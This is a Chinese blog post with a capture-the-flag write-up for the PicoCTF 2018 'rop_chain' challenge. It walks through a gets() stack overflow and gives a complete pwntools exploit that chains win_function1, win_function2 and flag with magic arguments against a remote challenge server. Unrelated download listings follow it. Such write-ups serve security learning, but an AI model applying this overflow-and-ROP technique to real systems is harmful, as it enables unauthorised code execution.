PicoCTF_2018_rop_chain

于 2021-11-24 10:05:50 发布
阅读量665 收藏 1
点赞数 2
分类专栏: BUU-PWN 文章标签: pwn 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/121509197
版权

PicoCTF_2018_rop_chain

使用checksec查看:
在这里插入图片描述
只开启了栈不可执行,放入IDA中查看:
在这里插入图片描述
主函数中直接给出了漏洞函数,跟进查看:
在这里插入图片描述
很明显gets()函数存在一个栈溢出,距离ebp0x18

查看发现存在flag.txt字符串,跟进可以发现函数falg,:
在这里插入图片描述
将flag读入到了参数s里面,满足条件win1&&win2 &&a1==-59039827的条件,就能读出flag

找到win1赋值的函数:
在这里插入图片描述
发现win1已经被赋值1,可以不用管,

接着看win2赋值的函数:
在这里插入图片描述
当满足win1 && a1 == -1163220307时,win2将被赋值1,这里win1已经满足了,所以只需要给win_function2传参时,将参数设置成-1163220307即可。

满足win1win2后再返回来看flag函数,最后只需要满足a1 == -559039827即可输出flag。

a1是从flag函数的参数中获取的,也是我们可控的。

这样完整的rop就可以实现了。

exp:

from pwn import *

#start
r = remote("node4.buuoj.cn",26324)
# r = process("../buu/picoctf_2018_rop chain")
elf = ELF("../buu/PicoCTF_2018_rop_chain")


#params
flag_addr = elf.symbols['flag']
win1_addr = elf.symbols['win_function1']
win2_addr = elf.symbols['win_function2']
win2_a = 0x0BAAAAAAD
flag_a = 0x0DEADBAAD

#attack
payload = b'M'*(0x18+4) + p32(win1_addr) + p32(win2_addr) + p32(flag_addr) + p32(win2_a) + p32(flag_a)
r.sendlineafter("input> ",payload)

r.interactive()
基于Vue和SpringBoot的医院门诊预约挂号管理系统源码+数据库(毕业设计).zip
08-26
基于SpringBoot和Vue的医院门诊预约挂号管理系统源码+数据库(毕业设计).zip 该项目是个人高分毕业设计项目源码,评审分达到96分以上,都经过严格调试,确保可以运行!放心下载使用。 该项目资源主要针对计算机相关...
Java毕业设计:Java校园影院多媒体预约系统毕业设计源代码成品开题报告
杭州.黄老师
09-19 2398
黄菊华老师《Vue.js入门与商城开发实战》《微信小程序商城开发》图书作者,CSDN博客专家,在线教育专家,CSDN钻石讲师;专注大学生毕业设计教育和辅导。所有项目都配有从入门到精通的基础知识视频课程,学习后应对毕业设计答辩。项目配有对应开发文档、开题报告、任务书、PPT、论文模版等项目都录了发布和功能操作演示视频;项目的界面和功能都可以定制,包安装运行!!!如果需要联系我,可以在CSDN网站查询黄菊华老师。
基于Springboot+vue的校园网站的设计与实现源码+数据库(高分毕业设计).zip
08-12
基于Springboot+vue的校园网站的设计与实现源码+数据库(高分毕业设计).zip 已获导师指导并通过的高分毕业设计,也可作为课程设计,期末大作业,含有代码注释,新手也可看懂。高分必看,已获高分通过项目。该系统...
毕业设计基于springboot校园快递驿站管理系统的设计与实现项目源码.zip
06-12
毕业设计基于springboot校园快递驿站管理系统的设计与实现项目源码内附数据库文件。非常完整的快递驿站管理系统,含有代码注释,新手也可看懂。个毕业设计、期末大作业高分必看 SpringBoot+MySQL+Redis 前端:Vue...
校园失物招领-java-基于springBoot校园失物招领系统设计与实现(毕业论文)
10-23
管理员的功能主要包括用户管理、新闻管理、书籍管理和评论管理等。 用户在没有注册之前,进入网站,用户的主要功能包括查看网站首页、论坛、公告信息、失物招领信息和失物挂失信息,用户在注册登录后进入网站,用户...
Java毕业设计-基于SpringBoot+Vue的校园闲置物品交易网站设计实现(源码+数据库).zip
03-26
Java毕业设计-基于SpringBoot+Vue的校园闲置物品交易网站设计实现(源码+数据库).zipSpringBoot 毕业设计SpringBoot 课程设计,基于SpringBoot+Vue开发的,含有代码注释,新手也可看懂。毕业设计、期末大作业、...
基于vue的社区互助平台--论文.zip
11-09
基于SSM的毕业设计源码
分布式系统中ZooKeeper入门与实战初探
最新发布
11-09
内容概要:本文介绍了ZooKeeper的基本概念,包括数据模型、节点、会话和监听机制等,并详细阐述了ZooKeeper的安装配置流程、基本操作方法以及高级特性的使用技巧。此外,还讨论了ZooKeeper在分布式锁、命名服务、配置管理、队列和组服务等多种应用场景下的实际应用。 适合人群:对于初学者和技术爱好者,尤其是从事分布式系统开发的工程师,希望通过学习和理解ZooKeeper的工作原理及其典型应用场景。 使用场景及目标:旨在帮助读者掌握ZooKeeper的基础理论知识和实际动手能力,能够熟练运用ZooKeeper解决分布式系统中的协同作业问题。 阅读建议:建议读者跟随教程逐步操作,亲身体验各个功能的实际效果,从而加深对知识点的理解,增强解决问题的能力。同时也要关注其局限性和最佳实践建议。
高分毕业设计基于XGBoost的O2O优惠券使用预测分析系统设计与实现源码+详细文档说明
11-09
高分毕业设计基于XGBoost的O2O优惠券使用预测分析系统设计与实现源码+详细文档说明,含有代码注释,新手也可看懂,个人手打98分项目,导师非常认可的高分项目,毕业设计、期末大作业和课程设计高分必看,下载下来,简单部署,就可以使用。该项目可以直接作为毕设、期末大作业使用,代码都在里面,系统功能完善、界面美观、操作简单、功能齐全、管理便捷,具有很高的实际应用价值,项目都经过严格调试,确保可以运行! 高分毕业设计基于XGBoost的O2O优惠券使用预测分析系统设计与实现源码+详细文档说明高分毕业设计基于XGBoost的O2O优惠券使用预测分析系统设计与实现源码+详细文档说明高分毕业设计基于XGBoost的O2O优惠券使用预测分析系统设计与实现源码+详细文档说明高分毕业设计基于XGBoost的O2O优惠券使用预测分析系统设计与实现源码+详细文档说明高分毕业设计基于XGBoost的O2O优惠券使用预测分析系统设计与实现源码+详细文档说明高分毕业设计基于XGBoost的O2O优惠券使用预测分析系统设计与实现源码+详细文档说明高分毕业设计基于XGBoost的O2O优惠券使用预测分析系统设计与实
高分springboot毕设+vue高校学生求职就业平台-Java源码.zip
11-09
本项目是一个基于Spring Boot和Vue的高校学生求职就业平台,旨在为计算机相关专业的学生提供一个实践和学习的平台,同时也为高校学生提供求职就业的相关服务。项目的主要功能包括用户注册登录、职位信息发布、简历投递、在线面试安排以及就业指导等。通过这个平台,学生可以方便地获取最新的就业信息,与企业进行直接的沟通,提升自己的求职能力。 技术实现方面,后端采用Spring Boot框架,利用其快速开发和部署的特点,结合数据库技术实现数据的存储和管理。前端则使用Vue.js,通过其组件化和响应式的特性,构建出用户友好的交互界面。这种前后端分离的开发模式,不仅提高了系统的可维护性和扩展性,也使得开发者能够更加专注于业务逻辑的实现。 此外,项目的开发还充分考虑了安全性,通过身份验证和权限控制等手段,确保用户信息的安全。
家校合作平台&java&基于springboot家校合作平台设计与实现
11-09
家校合作平台&java&基于springboot家校合作平台设计与实现
rasterio-1.3.11-cp311-cp311-win-amd64
11-09
rasterio-1.3.11-cp311-cp311-win_amd64
高分springboot毕设+vue的校园服务系统-Java源码.zip
11-09
本项目是一个基于Spring Boot和Vue框架的校园服务系统,旨在为高校师生提供一个便捷、高效的校园服务平台。项目源码适用于计算机相关专业的毕设学生以及需要进行项目实战练习的Java学习者。 该系统的主要功能包括校园资讯发布、课程安排查询、成绩管理、图书借阅、社团活动报名等。通过这些功能,用户可以方便地获取校园内的各类信息,提高学习和生活的效率。系统后端采用Spring Boot框架,实现了高效的数据处理和业务逻辑处理;前端则使用Vue框架,提供了友好的用户界面和流畅的用户体验。 开发此项目的目的在于帮助学生将理论知识应用于实际开发中,提升其编程能力和解决问题的能力。同时,该项目也为Java学习者提供了一个完整的项目实战案例,有助于加深对相关技术的理解和掌握。通过参与本项目的开发,学生们不仅可以锻炼自己的技术能力,还能更好地理解校园服务的实际需求,为未来的职业生涯打下坚实的基础。
党务政务服务热线平台设计与实现--论文.zip
11-09
基于SSM的毕业设计源码
2110501403康茹雪.doc
11-09
2110501403康茹雪.doc
macOS_Sequoia_15.1.password(imacos.top).rdr.split.045
11-09
macOS_Sequoia_15.1.password(imacos.top).rdr.split.045
PbootCms微信小程序社交电商软件公司官网源码
11-09
源码是pbootcms开发的官网系统 后台非常简单明了。 程序需要授权 授权码可在pbootcms免费生成 不需要收费 源码非常不错。可做企业官网也可以做软件工作室官网。布局非常好看。(带手机版自适应) 非历史版本:已优化 增加应用中心 微信拓客板块。仿米云优店官网。带部分数据。程序不需要装数据库 数据库是sqlite 上传就能使用。 优化 应用中心增加详情版。不在是链接。 服务器环境: PHP>=5.3,支持最新的PHP7 系统默认采用Sqlite数据库,放入PHP(5.3+)环境即可直接使用, 系统独家支持七牛云对接,无论你是否启用七牛云,请把轮播图,栏目大图,定制标签内的部分图片重新上传 可直接保存图片,重新上传一下,否则不会图片可能会不显示(因为那些图片在我们的七牛云内) 授权码生成:https://www.pbootcms.com/freesn/ 默认采用sqlite数据库,不需要做导入和配置操作 为了网站各个页面正常运行,请不要修改URL规则 统计代码、商桥代码、各种客服<script>…<script/>代码,均可放置在后台统计位置,全站生效。
技术资料分享SD卡要点说明很好的技术资料.zip
11-09
技术资料分享SD卡要点说明很好的技术资料.zip
ISO 11611-2024.pdf
11-09
ISO 11611-2024.pdf
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值